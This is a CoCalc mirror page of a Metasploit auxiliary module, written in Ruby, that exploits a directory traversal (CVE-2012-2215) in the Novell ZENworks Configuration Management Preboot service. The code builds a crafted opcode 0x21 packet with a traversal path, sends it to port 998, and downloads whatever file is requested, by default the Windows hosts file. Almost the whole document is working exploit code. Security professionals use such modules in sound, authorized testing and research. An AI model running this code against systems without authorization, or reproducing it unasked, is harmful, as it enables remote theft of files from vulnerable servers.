Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8
  include Msf::Auxiliary::Report

9
  include Msf::Auxiliary::Scanner

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Novell ZENworks Configuration Management Preboot Service Remote File Access',

16
        'Description' => %q{

17
          This module exploits a directory traversal in the ZENworks Configuration Management.

18
          The vulnerability exists in the Preboot service and can be triggered by sending a specially

19
          crafted PROXY_CMD_FTP_FILE (opcode 0x21) packet to the 998/TCP port. This module has been

20
          successfully tested on Novell ZENworks Configuration Management 10 SP2 and SP3 over Windows.

21
        },

22
        'License' => MSF_LICENSE,

23
        'Author' => [

24
          'Luigi Auriemma', # Vulnerability Discovery

25
          'juan vazquez' # Metasploit module

26
        ],

27
        'References' => [

28
          [ 'CVE', '2012-2215' ],

29
          [ 'OSVDB', '80230' ],

30
          [ 'URL', 'https://web.archive.org/web/20121103122235/http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=975' ]

31
        ],

32
        'Notes' => {

33
          'Reliability' => UNKNOWN_RELIABILITY,

34
          'Stability' => UNKNOWN_STABILITY,

35
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

36
        }

37
      )

38
    )

39


40
    register_options(

41
      [

42
        Opt::RPORT(998),

43
        OptString.new('FILEPATH', [true, 'The name of the file to download', '\\WINDOWS\\system32\\drivers\\etc\\hosts']),

44
        OptInt.new('DEPTH', [true, 'Traversal depth', 6])

45
      ]

46
    )

47
  end

48


49
  def run_host(ip)

50
    # No point to continue if no filename is specified

51
    if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?

52
      print_error("Please supply the name of the file you want to download")

53
      return

54
    end

55


56
    travs = "\\.." * datastore['DEPTH']

57
    travs << "\\" unless datastore['FILEPATH'][0] == "\\"

58
    travs << datastore['FILEPATH']

59


60
    payload = Rex::Text.to_unicode(travs)

61
    packet = [0x21].pack("N") # Opcode

62
    packet << [payload.length].pack("N") # Length

63
    packet << payload # Value

64


65
    connect

66
    sock.put(packet)

67
    sock.get_once(4, 1)

68
    length = sock.get_once(4, 1)

69


70
    unless length

71
      print_error("Unable to get length due to a timeout")

72
      return

73
    end

74


75
    sock.get_once(0x210 - 8, 1)

76
    contents = sock.get_once(length.unpack("V").first, 1)

77


78
    unless contents

79
      print_error("Unable to extract contents due to a timeout")

80
      return

81
    end

82


83
    disconnect

84


85
    print_good "File retrieved successfully!"

86
    fname = File.basename(datastore['FILEPATH'])

87
    path = store_loot(

88
      'novell.zenworks_configuration_management',

89
      'application/octet-stream',

90
      ip,

91
      contents,

92
      fname

93
    )

94
    print_status("File saved in: #{path}")

95
  end

96
end

97


98